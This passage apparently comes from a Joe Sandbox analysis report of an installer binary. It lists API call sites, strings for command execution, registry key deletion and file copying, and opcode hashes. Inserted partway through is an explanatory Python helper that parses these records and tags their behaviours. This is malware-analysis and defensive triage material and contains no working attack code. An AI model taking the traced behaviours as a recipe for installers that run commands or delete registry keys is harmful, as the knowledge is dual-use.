                                                      • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                      • String ID: RMDir: RemoveDirectory invalid input("")
                                                      • API String ID: 3734993849-2769509956
                                                      • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                      • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                      • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                      • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                      • GetSysColor.USER32(00000000), ref: 00403E00
                                                      • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                      • SetBkMode.GDI32(?,?), ref: 00403E18
                                                      • GetSysColor.USER32(?), ref: 00403E2B
                                                      • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                      • DeleteObject.GDI32(?), ref: 00403E55
                                                      • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                      • String ID:
                                                      • API String ID: 2320649405-0
                                                      • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                      • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                      • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                      • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                        • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                        • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                      • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                      Strings
                                                      • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                      • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                      • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                      • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                      • API String ID: 1033533793-945480824
                                                      • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                      • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                      • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                      • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                      APIs
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                        • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                        • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                        • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                        • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                      • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                      Strings
                                                      • Exec: command="%s", xrefs: 00402241
                                                      • Exec: success ("%s"), xrefs: 00402263
                                                      • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                      • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                      • API String ID: 2014279497-3433828417
                                                      • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                      • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                      • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                      • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                      APIs
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                      • GetMessagePos.USER32 ref: 00404871
                                                      • ScreenToClient.USER32(?,?), ref: 00404889
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Message$Send$ClientScreen
                                                      • String ID: f
                                                      • API String ID: 41195575-1993550816
                                                      • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                      • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                      • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                      • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                      APIs
                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                      • MulDiv.KERNEL32(00029A00,00000064,?), ref: 00403295
                                                      • wsprintfW.USER32 ref: 004032A5
                                                      • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                      Strings
                                                      • verifying installer: %d%%, xrefs: 0040329F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                      • String ID: verifying installer: %d%%
                                                      • API String ID: 1451636040-82062127
                                                      • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                      • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                      • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                      • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                      APIs
                                                      • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                      • wsprintfW.USER32 ref: 00404457
                                                      • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: ItemTextlstrlenwsprintf
                                                      • String ID: %u.%u%s%s$@rD
                                                      • API String ID: 3540041739-1813061909
                                                      • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                      • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                      • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                      • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                      APIs
                                                      • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                      • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                      • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                      • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Char$Next$Prev
                                                      • String ID: *?|<>/":
                                                      • API String ID: 589700163-165019052
                                                      • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                      • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                      • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                      • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                      • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                      • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Close$DeleteEnumOpen
                                                      • String ID:
                                                      • API String ID: 1912718029-0
                                                      • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                      • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                      • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                      • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
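The function records above list raw API call sites (CreateProcessW followed by WaitForSingleObject and GetExitCodeProcess around 00402288; RegOpenKeyExW, RegEnumKeyW and RegDeleteKeyW around 004014BF; CharNextW walking a string against the character set *?|<>/": around 0040609B). Reading those by hand across hundreds of records is slow, so the following added Python example (an editor's triage helper, not code from Joe Sandbox or from the sample) parses the "APIs" bullets of such records, extracts the call site, module, arguments and subcall owner, and tags each function with a behaviour when a full API combination is present. The behaviour names, the regular expression and the sample records (copied from the lines above, trimmed) are this example's own assumptions; argument splitting on commas is only reliable for numeric arguments, since the report does not quote string literals.

```python
import re

# Constructed sample input: "APIs" bullets copied from four function records in
# this report (Exec handler near 00402288, registry-key delete loop near 004014BF,
# filename check near 0040609B, and a UI-only timer function near 0040326A).
SAMPLE_RECORDS = [
    [
        "• Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64",
        "• Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71",
        "• WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288",
        "• GetExitCodeProcess.KERNEL32(?,?), ref: 00402298",
        "• CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2",
    ],
    [
        "• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF",
        "• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB",
        "• RegCloseKey.ADVAPI32(?), ref: 00401504",
        "• RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547",
    ],
    [
        '• CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0), ref: 0040609B',
        "• CharPrevW.USER32(?,?,004C30A0,004D70C8), ref: 004060C3",
    ],
    [
        "• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A",
        "• wsprintfW.USER32 ref: 004032A5",
    ],
]

# One "APIs" bullet: optional subcall owner, Api.MODULE, optional (args), call site.
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\),)?"
    r" ref: (?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# API sets that, together in one function, describe a behaviour worth noting in
# triage. Labels are this example's own, not report signatures.
BEHAVIOUR_RULES = {
    "spawns a process and waits for its exit code":
        {"CreateProcessW", "WaitForSingleObject", "GetExitCodeProcess"},
    "enumerates and deletes registry keys":
        {"RegOpenKeyExW", "RegEnumKeyW", "RegDeleteKeyW"},
}
INVALID_FILENAME_CHARS = '*?|<>/":'


def hex_arg(value):
    """Decode an 8-hex-digit argument as a signed 32-bit int; None for '?' or text."""
    if not re.fullmatch(r"[0-9A-Fa-f]{8}", value):
        return None
    n = int(value, 16)
    return n - (1 << 32) if n & 0x80000000 else n


def parse_api_line(line):
    """Split one bullet into api, module, raw args, call-site address and subcall owner."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = m.group("args")
    return {
        "api": m.group("api"),
        "module": m.group("mod"),
        "args": args.split(",") if args else [],   # unquoted strings may contain commas
        "ref": int(m.group("ref"), 16),
        "subcall": m.group("sub"),
    }


def tag_calls(calls):
    """Return behaviour labels whose complete API set occurs among the calls."""
    apis = {c["api"] for c in calls}
    tags = [name for name, needed in BEHAVIOUR_RULES.items() if needed <= apis]
    # The literal invalid-character set handed to CharNextW marks a filename validator.
    if "CharNextW" in apis and any(
            INVALID_FILENAME_CHARS in a for c in calls for a in c["args"]):
        tags.append("validates filename characters")
    return tags


def summarize_record(lines):
    """Parse one record's APIs section; report its own call-site range, APIs and tags."""
    calls = [c for c in (parse_api_line(l) for l in lines) if c]
    own = [c for c in calls if c["subcall"] is None] or calls
    refs = [c["ref"] for c in own]
    return {
        "entry_range": (f"{min(refs):08X}", f"{max(refs):08X}"),
        "apis": [c["api"] for c in calls],
        "tags": tag_calls(calls),
    }


def summarize(records):
    return [summarize_record(r) for r in records]


def wait_timeout_ms(calls):
    """Timeout argument of the first WaitForSingleObject call, in ms (None if absent)."""
    for c in calls:
        if c["api"] == "WaitForSingleObject" and len(c["args"]) > 1:
            return hex_arg(c["args"][1])
    return None


if __name__ == "__main__":
    for s in summarize(SAMPLE_RECORDS):
        print(s["entry_range"], s["tags"] or "-", " ".join(s["apis"]))
```

Subcall lines are kept for tagging (the CreateProcessW that the Exec handler reaches through 00405C3F is what makes the process-spawn rule fire) but excluded from the call-site range, so the range reflects the function's own body. The WaitForSingleObject timeout argument 00000064 decodes to 100 ms, which, with the call sitting inside a loop that also services GetExitCodeProcess, is the usual poll-until-exit shape rather than a blocking wait.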
                                                      APIs
                                                      • GetDlgItem.USER32(?), ref: 004020A3
                                                      • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                      • DeleteObject.GDI32(00000000), ref: 004020EE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                      • String ID:
                                                      • API String ID: 1849352358-0
                                                      • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                      • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                      • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                      • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Timeout
                                                      • String ID: !
                                                      • API String ID: 1777923405-2657877971
                                                      • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                      • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                      • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                      • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                      APIs
                                                        • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      Strings
                                                      • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                      • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                      • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                      • API String ID: 1697273262-1764544995
                                                      • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                      • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                      • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                      • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 00404902
                                                      • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                        • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Window$CallMessageProcSendVisible
                                                      • String ID: $@rD
                                                      • API String ID: 3748168415-881980237
                                                      • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                      • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                      • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                      • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                      APIs
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                        • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                        • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                      • lstrlenW.KERNEL32 ref: 004026B4
                                                      • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                      • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                      • String ID: CopyFiles "%s"->"%s"
                                                      • API String ID: 2577523808-3778932970
                                                      • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                      • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
